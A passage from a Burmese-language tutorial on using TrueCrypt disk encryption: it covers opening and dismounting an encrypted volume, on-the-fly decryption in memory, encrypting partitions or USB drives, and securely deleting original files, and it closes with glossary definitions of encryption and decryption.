ထရုခရစ်က ခုနသတ်မှတ်ပေးခဲ့တဲ့ သိုလှောင်နေရာကို ပြန်ဖွင့်ပါလိမ့်မယ်။ စကားဝှက်မှားခဲ့ရင် (စာသား မှားရိုက်မိခဲ့ရင်) စကားဝှက် ထပ်မံဖြည့်သွင်းရန် အကြောင်းပြန်ပါမယ်။ (စကားဝှက်ထပ်ရိုက်ပြီး OK ထပ်နှိပ်ပါ။) စကားဝှက် မှန်ပါက သိုလှောင်နေရာကို ဖွင့်ပေးပါလိမ့်မယ်။




နောက်ဆုံးအဆင့်

Disk M ကို အခု ပြန်ဖွင့်လို့ရပါပြီ။ အခုပြန်ဖွင့်လို့ရတဲ့ သိုလှောင်နေရာ တစ်ခုလုံး (၄င်းအောက်ရှိ ဖိုင်အမည်၊ ထားရှိသည့်နေရာ၊ လက်ကျန်နေရာ စသဖြင့်) တို့ကို လျှို့ဝှက်သင်္ကေတပြောင်းစနစ်  Encryption ဖြင့် အကာကွယ်ပေးထားပါတယ်။ မည်သည့်ဖိုင်မဆို ၄င်းသိုလှောင်နေရာအောက်မှာ သိမ်းနိုင်ပါတယ်။ မည်သည့်ဖိုင်မျိုးကိုမဆို ထရုခရစ်အောက် ကူးယူနေချိန်၊ ရွေ့ပြောင်းနေချိန်အတွင်း တွင်ပင် ပုံစံဖျက်ပေးထားနိုင်တယ်။
ဥပမာတစ်ခုအနေနှင့် ထရုခရစ်အောက်မှ သီချင်းဖိုင်တစ်ခုကို Media Player တစ်ခုတွင် ဖွင့်တဲ့အခါ ဖွင့်တဲ့အချိန်အတွင်းသာ ဖိုင်ကို ကွန်ပျူတာမှတ်ဉာဏ် (RAM) က သိရှိနိုင်ရန် ပုံဖျက်ထားရာကနေ ပုံမှန်အနေအထား ရှိစေရန် ယာယီ လျှို့ဝှက်သင်္ကေတဖေါ်စနစ် (Decrypt) အဆင့်ကို ပြုလုပ်ပေးထားတယ်။ ၄င်းဖိုင်ကို ပြန်ပိတ်လိုက်တာနှင့် လျှို့ဝှက်သင်္ကေတပြောင်းစနစ်ကို ပြန်ပြောင်း ပေးပါတယ်။
သတိပြုရန် - ထရုခရစ်သိုလှောင်နေရာကို ဖွင့်ထားပြီး ၄င်းအောက်ရှိဖိုင်များကို ဖွင့်ရာ၊ ကူးယူရာ၊ အခြားဖိုင်များကို ထပ်မံဖြည့်ထားရာတွင် စကားဝှက်ကို အကြိမ်ကြိမ် ထပ်ဖြည့်ပေးရန် မလိုအပ်ပါ။ ထရုခရစ်သိုလှောင်နေရာကို ၀င်ရန် တစ်ကြိမ်သာ စကားဝှက်အမှန်ကို ဖြည့်ရန် လိုသည်။
ဥပမာအနေဖြင့် ဖွင့်ထားပြီးသား ထရုခရစ်နေရာကို မောက်စ် နှစ်ချက်ဆက်တိုက်နှိပ်၍ ၀င်ရောက် နိုင်သည်။ (အပေါ်ပုံတွင် အနီရောင်ဘောင်ကွပ် ပြထားသည့် နေရာကို နှိပ်၍ ၀င်နိုင်သည်။)
သာမန်ဖိုလ်ဒါနှင့် အချက်အလက် သိုလှောင်နေရာများ (Drive) ကို ၀င်ရောက် ကြည့်ရှု ရှာဖွေသကဲ့သို့ပင် ပြုလုပ်နိုင်သည်။ ဥပမာ အနေဖြင့် My Computer ကို ၀င်ရောက်ရန် ၄င်းအိုင်ကွန် အရုပ်ပေါ်တွင် မောက်စ်ကို နှစ်ချက်ဆက်တိုက် နှိပ်၍၀င်သည့်ပုံစံမျိုးကို ဆိုလိုသည်။ (အခုပြထားသည့် နမူနာတွင် Drive M ကို ၀င်ရောက်ခြင်းပင်ဖြစ်သည်။)

ထရုခရစ်သိုလှောင်သိမ်းဆည်းသည့်နေရာ အောက်ရှိ ဖိုင်နှင့် ဖိုလ်ဒါများကို သာမန်ဖိုင်များ၊ ဖိုလ်ဒါများကဲ့သို့ပင် ဆွဲယူချခြင်း (drag-and-drop) မျိုးကို ပြုလုပ်နိုင်ပါတယ်။ ထရုခရစ်အောက်ရှိ ဖိုင်တစ်ခုခုကို ကူးယူနေချိန်၊ အသုံးပြုနေချိန် အတွင်း၌သာ ကွန်ပျူတာမှတ်ဉာဏ်မှ သိရှိနိုင်ရန် ဖိုင်ကို လျှို့ဝှက်သင်္ကေတဖေါ်စနစ် (Decrypt) ကို ပြုလုပ်ပေးပါတယ်။ ထရုခရစ်အောက်တွင် ထည့်သွင်းနေသော၊ ကူးယူနေသော ဖိုင်မျိုးကို ကူးယူနေစဉ်၊ ထည့်သွင်းနေစဉ် တချိန်တည်း၌ ပုံဖျက်ပေးတယ်။ ကွန်ပျူတာမှတ်ဉာဏ် အတွင်း၌ပင် မကျန်ခဲ့စေရန် ပုံဖျက်ပေးသည့် သဘောဖြစ်ပါတယ်။
မှတ်သားသင့်သည့် အချက်မှာ ထရုခရစ်အောက်တွင် အလုပ်လုပ်နေသော မည်သည့်ဖိုင်ကိုမဆို ၄င်းအသုံးပြုနေသော ကွန်ပျူတာအတွင်း လျှို့ဝှက်သင်္ကေတဖေါ်စနစ်ကို သုံး၍ ထားရှိအလုပ်လုပ်ခြင်း မဟုတ်ပါ။ ၄င်းကွန်ပျူတာ၏ မှတ်ဉာဏ်တွင် ခဏသာ အသုံးပြု၍ အလုပ်လုပ်ခြင်း ဖြစ်သည်။ ၄င်းထရုခရစ်နေရာကို ဖွင့်ထားစဉ်တွင်ပင် ၄င်းအောက်ရှိ ဖိုင်များကို ပုံဖျက်ပေးထားနိုင်သည်။ စက်ကို ခဏပိတ်ပြီး ပြန်ဖွင့်သည့် အခါတွင်ဖြစ်ဖြစ်၊ စက်ကို ပိတ်ပြီး ပြန်ဖွင့်သည့် အခါတွင်ဖြစ်ဖြစ် စက်ပိတ်သည်နှင့် ထရုခရစ်လည်း ပိတ်သွားပြီး ထရုခရစ်အောက်ရှိ ဖိုင်များကို သာမန်ဖိုင်များ ပြန်ရှာသကဲ့သို့ ပြန်ရှာ၍ မရပေ။ စက်ရုတ်တရက် ပိတ်သွားလျှင်ပင် ထရုခရစ် အလိုလိုပိတ်ပြီးသား ဖြစ်သည်။ ၄င်းအောက်ရှိ ဖိုင်များကို ပြန်ဖွင့်ချင်လျှင် အဆင့် ၁၃ မှ ၁၈ အထိ ညွန်ကြားချက်အတိုင်း ပြန်ဖွင့်မှသာ ပြန်ပွင့်နိုင်သည်။
ဖွင့်ထားသော ထရုခရစ်နေရာကို ပိတ်ပြီး ၄င်းအောက်ရှိ ဖိုင်များကို ဖွင့်မရအောင် လုပ်လိုပါက စက်ကို ပိတ်ဖွင့်လုပ်ခိုင်းခြင်းဖြစ်စေ၊ ပိတ်လိုက်ခြင်းဖြစ်စေ လုပ်ပါ။ အဲဒီအတွက် အောက်က အဆင့်တွေ အတိုင်း လုပ်ကြည့်နိုင်ပါတယ်။

ထရုခရစ် ၀င်းဒိုးအောက်မှာ ဖွင့်ထားတဲ့ သိုလှောင်နေရာကို ရွေးလိုက်ပါ။ (ပုံမှာ အနီရောင်နဲ့ ဘောင်ခပ်ပြထားတယ်။) ပြီးရင် Dismount (အောက်မှာ အနီရောင်ဘောင်နဲ့ ခလုတ်ပါ။) ကို နှိပ်လိုက်ပါ။ ပြန်ဖွင့်ချင်ရင် အဆင့် ၁၃ နဲ့ ၁၈ အတိုင်းပြန်လုပ်ကြည့်ပါ။



TrueCrypt Partition/Device ဘယ်လို လုပ်နိုင်သလဲ၊ ဘယ်လိုသုံးမလဲ
အရင်အဆင့်တွေမှာ လျှို့ဝှက်သင်္ကေတပြောင်းစနစ် မလုပ်ထားတဲ့ ဖိုင်တစ်ခုကိုသာ ထရုခရစ်နေရာ အဖြစ် ပြုလုပ်ခဲ့တယ်။ အဲဒီနည်းအတိုင်းပဲ Partitions နဲ့ Drive (ထရုခရစ်ထည့်သွင်းထားတဲ့ သိုလှောင်နိုင်သည့် Device - ဥပမာ USB Drive) တို့ကို သတ်မှတ် အသုံးပြုနိုင်ပါတယ်။ အဆင့် ၁ ကနေ ၁၈ အထိ ပြန်လုပ်ရပါမယ်။ ဒါပေမယ့် အဆင့် ၃ ရောက်ရင် ဒုတိယနဲ့ တတိယ ရွေးချယ်မှု Option ထဲက မိမိရွေးလိုတာကို ရွေးပေးပြီး ပြုလုပ်နိုင်ပါတယ်။ အဲဒီမှာ Select File ကို မရွေးဘဲ Select Drive ဆိုတာကို ထပ်ရွေးတဲ့ ပုံစံမျိုးပါ။
သတိပြုရန် - အခုပို့ချခဲ့တဲ့ သင်ခန်းစာ အားလုံးကို အလွယ်ဆုံးနဲ့ အရှင်းဆုံးဖြစ်အောင် ကျန်တဲ့ အခန်းတွေ ဖြုတ်ထားခဲ့ပါတယ်။ အထူးအကြံပေးလိုတာက နောက်ထပ် အသေးစိတ် အချက်အလက်တွေ ပါဝင်တဲ့ ညွန်ကြားချက်တွေကို အသေးစိတ်ဖတ်ရှုလေ့လာကြဖို့ပါ။


* ထရုခရစ်အတွင်း ထည့်သွင်းလာတဲ့ မူရင်း လျှို့ဝှက်သင်္ကေတပြောင်းစနစ် မလုပ်ထားတဲ့ ဖိုင်တစ်ခု (unencrypted file) ကို ထည့်သွင်းပြီးပါက နဂိုမူရင်းနေရာကဖိုင်ကို ဖျက်ပစ်ဖို့ လိုအပ်ပါတယ်။ ဖိုင်တွေကို ဖျက်တဲ့အခါမှာ အမှားအယွင်းကင်းကင်းနဲ့ လုံးလုံးပျောက်သွားနိုင်အောင်၊ ဖျက်နိုင်အောင် ပြုလုပ်ထားတဲ့ ဆော့ဖ်ဝဲလ်တွေကို သုံးနိုင်ဖို့ လိုအပ်ပါတယ်။ (အတော်များများ အခမဲ့ ရယူ သုံးစွဲနိုင်နေပါပြီ။)
Encryption(လျှို့ဝှက်သင်္ကေတပြောင်းခြင်း/စနစ်) ဖိုင်တစ်ခုခုကို၊ ရေးသားထားသော အကြောင်းအရာ တစ်ခုခုကို ဂဏန်းသင်္ချာဖြင့် တွက်ချက်၍ ဖြစ်စေ၊ ကွန်ပျူတာနည်းပညာဖြင့် ဖြစ်စေ သာမန်အားဖြင့် အလွယ်တကူ ဖတ်ရှု၍ မရအောင် လျှို့ဝှက်သင်္ကေတများဖြင့် အစားထိုးကာ ပုံစံဖျက်ထားခြင်းကို ခေါ်သည်။
Decryption(လျှို့ဝှက်သင်္ကေတဖေါ်ခြင်း/စနစ်) လျှို့ဝှက်သင်္ကေတပြောင်း နည်းပညာဖြင့် အကာအကွယ် ပြုလုပ်ထားသော ဖိုင်ကို ပြန်လည်ဖတ်ရှုနိုင်ရန် ပြန်ဖော်ပေးခြင်းကို ခေါ်သည်။



အပြည့်အစုံ